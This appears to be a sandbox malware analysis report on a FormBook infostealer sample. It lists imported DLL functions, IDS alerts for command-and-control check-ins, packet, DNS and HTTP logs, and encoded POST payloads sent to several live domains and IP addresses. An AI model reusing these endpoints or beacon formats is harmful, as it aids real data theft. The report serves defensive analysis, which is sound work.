OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T20:18:28.466784+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49807	81.169.145.72	80	TCP
2025-01-10T20:18:44.273584+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49904	216.40.34.41	80	TCP
2025-01-10T20:18:47.031565+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49921	216.40.34.41	80	TCP
2025-01-10T20:18:49.432901+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49937	216.40.34.41	80	TCP
2025-01-10T20:18:51.870906+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49953	216.40.34.41	80	TCP
2025-01-10T20:19:05.975750+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50007	3.33.130.190	80	TCP
2025-01-10T20:19:08.533539+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50008	3.33.130.190	80	TCP
2025-01-10T20:19:11.128177+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50009	3.33.130.190	80	TCP
2025-01-10T20:19:13.621410+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50010	3.33.130.190	80	TCP
2025-01-10T20:19:19.654257+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50011	103.249.106.91	80	TCP
2025-01-10T20:19:22.195557+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50012	103.249.106.91	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:18:27.797269106 CET	49807	80	192.168.2.4	81.169.145.72
Jan 10, 2025 20:18:27.802092075 CET	80	49807	81.169.145.72	192.168.2.4
Jan 10, 2025 20:18:27.802200079 CET	49807	80	192.168.2.4	81.169.145.72
Jan 10, 2025 20:18:27.811980963 CET	49807	80	192.168.2.4	81.169.145.72
Jan 10, 2025 20:18:27.816848993 CET	80	49807	81.169.145.72	192.168.2.4
Jan 10, 2025 20:18:28.466543913 CET	80	49807	81.169.145.72	192.168.2.4
Jan 10, 2025 20:18:28.466697931 CET	80	49807	81.169.145.72	192.168.2.4
Jan 10, 2025 20:18:28.466784000 CET	49807	80	192.168.2.4	81.169.145.72
Jan 10, 2025 20:18:28.470176935 CET	49807	80	192.168.2.4	81.169.145.72
Jan 10, 2025 20:18:28.474980116 CET	80	49807	81.169.145.72	192.168.2.4
Jan 10, 2025 20:18:43.738264084 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:43.743055105 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:43.743160009 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:43.763591051 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:43.768440008 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273484945 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273502111 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273544073 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273555994 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273569107 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273578882 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273583889 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:44.273590088 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273596048 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273602962 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273607969 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.273663044 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:44.273782969 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:44.278492928 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.278517962 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.278532028 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.278578997 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:44.292118073 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.292161942 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.292226076 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:44.365881920 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.365899086 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.365911961 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.365968943 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:44.365979910 CET	80	49904	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:44.366028070 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:45.268594980 CET	49904	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:46.284666061 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:46.289505959 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:46.289572954 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:46.303747892 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:46.308620930 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031430006 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031495094 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031529903 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031564951 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.031639099 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031689882 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031692982 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.031725883 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031776905 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031795025 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.031812906 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031847000 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031863928 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.031882048 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.031936884 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.036851883 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.036887884 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.036950111 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.050326109 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.050359964 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.050421000 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.118261099 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.118299961 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.118314028 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.118349075 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.118386984 CET	80	49921	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:47.118438005 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:47.812508106 CET	49921	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:48.831047058 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:48.835911989 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.836016893 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:48.850472927 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:48.855393887 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855407000 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855446100 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855456114 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855511904 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855524063 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855536938 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855576038 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:48.855623007 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432832956 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432849884 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432882071 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432893038 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432899952 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432900906 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.432913065 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432929993 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432929993 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.432936907 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432944059 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.432950974 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.433046103 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.433093071 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.437731028 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.451008081 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.451035023 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.451085091 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.523680925 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.523700953 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.523721933 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.523789883 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.523864985 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.523914099 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.523941040 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.523953915 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.523968935 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.524019003 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.524713993 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.524724007 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.524734974 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.524746895 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.524758101 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.524766922 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.524776936 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.524801970 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:49.525279999 CET	80	49937	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:49.525336981 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:50.359277964 CET	49937	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.378319025 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.383230925 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.383323908 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.392205000 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.397053003 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.870760918 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.870827913 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.870862007 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.870898008 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.870906115 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.870933056 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.870974064 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.871001959 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.871005058 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:18:51.871032953 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.871054888 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.875668049 CET	49953	80	192.168.2.4	216.40.34.41
Jan 10, 2025 20:18:51.880522966 CET	80	49953	216.40.34.41	192.168.2.4
Jan 10, 2025 20:19:05.515377998 CET	50007	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:05.520246029 CET	80	50007	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:05.520325899 CET	50007	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:05.536254883 CET	50007	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:05.541071892 CET	80	50007	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:05.975632906 CET	80	50007	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:05.975696087 CET	80	50007	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:05.975749969 CET	50007	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:07.046960115 CET	50007	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:08.065529108 CET	50008	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:08.070420980 CET	80	50008	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:08.070542097 CET	50008	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:08.091295958 CET	50008	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:08.096143961 CET	80	50008	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:08.533407927 CET	80	50008	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:08.533490896 CET	80	50008	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:08.533539057 CET	50008	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:09.593787909 CET	50008	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:10.612651110 CET	50009	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:10.618043900 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.618171930 CET	50009	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:10.633703947 CET	50009	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:10.638633966 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638650894 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638672113 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638683081 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638756037 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638766050 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638850927 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638859987 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:10.638873100 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:11.109635115 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:11.128077030 CET	80	50009	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:11.128176928 CET	50009	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:12.140841007 CET	50009	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:13.159775972 CET	50010	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:13.164618015 CET	80	50010	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:13.165112019 CET	50010	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:13.174047947 CET	50010	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:13.178849936 CET	80	50010	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:13.621006012 CET	80	50010	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:13.621035099 CET	80	50010	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:13.621409893 CET	50010	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:13.624083042 CET	50010	80	192.168.2.4	3.33.130.190
Jan 10, 2025 20:19:13.628887892 CET	80	50010	3.33.130.190	192.168.2.4
Jan 10, 2025 20:19:18.754620075 CET	50011	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:18.763005018 CET	80	50011	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:18.763134956 CET	50011	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:18.778896093 CET	50011	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:18.788428068 CET	80	50011	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:19.653882027 CET	80	50011	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:19.653938055 CET	80	50011	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:19.654257059 CET	50011	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:20.281271935 CET	50011	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:21.299906015 CET	50012	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:21.304801941 CET	80	50012	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:21.304892063 CET	50012	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:21.319701910 CET	50012	80	192.168.2.4	103.249.106.91
Jan 10, 2025 20:19:21.324651003 CET	80	50012	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:22.193831921 CET	80	50012	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:22.193964958 CET	80	50012	103.249.106.91	192.168.2.4
Jan 10, 2025 20:19:22.195557117 CET	50012	80	192.168.2.4	103.249.106.91

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:18:27.761660099 CET	62244	53	192.168.2.4	1.1.1.1
Jan 10, 2025 20:18:27.790149927 CET	53	62244	1.1.1.1	192.168.2.4
Jan 10, 2025 20:18:43.519418955 CET	51569	53	192.168.2.4	1.1.1.1
Jan 10, 2025 20:18:43.735481024 CET	53	51569	1.1.1.1	192.168.2.4
Jan 10, 2025 20:18:56.894027948 CET	49333	53	192.168.2.4	1.1.1.1
Jan 10, 2025 20:18:57.427319050 CET	53	49333	1.1.1.1	192.168.2.4
Jan 10, 2025 20:19:05.487982035 CET	53741	53	192.168.2.4	1.1.1.1
Jan 10, 2025 20:19:05.512593985 CET	53	53741	1.1.1.1	192.168.2.4
Jan 10, 2025 20:19:18.628675938 CET	61867	53	192.168.2.4	1.1.1.1
Jan 10, 2025 20:19:18.751914978 CET	53	61867	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 20:18:27.761660099 CET	192.168.2.4	1.1.1.1	0x919b	Standard query (0)	www.bonsai-stbg.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:18:43.519418955 CET	192.168.2.4	1.1.1.1	0x5a9d	Standard query (0)	www.sweetspotfitness.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:18:56.894027948 CET	192.168.2.4	1.1.1.1	0xb452	Standard query (0)	www.sortsport.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:05.487982035 CET	192.168.2.4	1.1.1.1	0x3e41	Standard query (0)	www.virtusign.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:18.628675938 CET	192.168.2.4	1.1.1.1	0xf4c6	Standard query (0)	www.8066642.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 20:18:27.790149927 CET	1.1.1.1	192.168.2.4	0x919b	No error (0)	www.bonsai-stbg.info	bonsai-stbg.info		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:18:27.790149927 CET	1.1.1.1	192.168.2.4	0x919b	No error (0)	bonsai-stbg.info		81.169.145.72	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:18:43.735481024 CET	1.1.1.1	192.168.2.4	0x5a9d	No error (0)	www.sweetspotfitness.net		216.40.34.41	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:18:57.427319050 CET	1.1.1.1	192.168.2.4	0xb452	Name error (3)	www.sortsport.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:05.512593985 CET	1.1.1.1	192.168.2.4	0x3e41	No error (0)	www.virtusign.info	virtusign.info		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:19:05.512593985 CET	1.1.1.1	192.168.2.4	0x3e41	No error (0)	virtusign.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:05.512593985 CET	1.1.1.1	192.168.2.4	0x3e41	No error (0)	virtusign.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:19:18.751914978 CET	1.1.1.1	192.168.2.4	0xf4c6	No error (0)	www.8066642.xyz		103.249.106.91	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.bonsai-stbg.info

www.sweetspotfitness.net

www.virtusign.info

www.8066642.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49807	81.169.145.72	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:18:27.811980963 CET	485	OUT	GET /3cb8/?28=ytMd5JoNDlp2jn5Pf080ZLd4stN1vAS6iwQxmGOCcgQqtWeYidPwJokyLIn5bfhZSz6tk8SdxwqnTJTPUhj5Hm4EFHb2t6dUrPwKRW7fy+YL2chtEAutPD0=&D48D=_fRxbHzp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.bonsai-stbg.info Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1
Jan 10, 2025 20:18:28.466543913 CET	374	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:18:28 GMT Server: Apache/2.4.62 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49904	216.40.34.41	80	3428	C:\Program Files (x86)\drwgeMHWaMPrCAGnpuyMOpGPfnjPMBYFOqIuXLWyssZ\bmHwSvjHTinzr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:18:43.763591051 CET	771	OUT	POST /lqx0/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.sweetspotfitness.net Cache-Control: no-cache Content-Length: 199 Connection: close Content-Type: application/x-www-form-urlencoded Origin: http://www.sweetspotfitness.net Referer: http://www.sweetspotfitness.net/lqx0/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.8.2 Safari/538.1 Data Raw: 32 38 3d 55 65 75 6c 47 79 65 73 4a 4d 4b 7a 31 65 6f 6e 66 56 36 6f 4e 4a 79 48 70 43 76 54 49 48 7a 34 57 59 6c 72 69 6d 77 37 48 68 2b 38 47 42 43 61 38 76 37 62 42 33 68 34 6e 32 64 6d 76 49 4c 47 31 74 4a 53 75 6d 55 35 41 52 32 36 66 51 39 4f 47 2b 48 57 47 73 6a 30 59 32 57 51 31 7a 68 47 50 2b 55 33 34 49 38 53 37 56 44 44 77 62 63 6b 48 73 4c 74 46 78 70 50 6f 6a 4b 32 65 53 4a 6b 5a 2f 63 38 70 6d 36 30 6c 58 36 59 30 75 42 67 70 4a 2b 68 4e 44 62 70 6a 6d 67 2f 79 32 38 58 62 6b 6a 37 67 47 50 38 78 54 68 43 62 70 4c 48 44 45 61 56 39 42 67 6e 4f 66 59 55 31 55 49 41 6e 67 3d 3d Data Ascii: 28=UeulGyesJMKz1eonfV6oNJyHpCvTIHz4WYlrimw7Hh+8GBCa8v7bB3h4n2dmvILG1tJSumU5AR26fQ9OG+HWGsj0Y2WQ1zhGP+U34I8S7VDDwbckHsLtFxpPojK2eSJkZ/c8pm60lX6Y0uBgpJ+hNDbpjmg/y28Xbkj7gGP8xThCbpLHDEaV9BgnOfYU1UIAng==
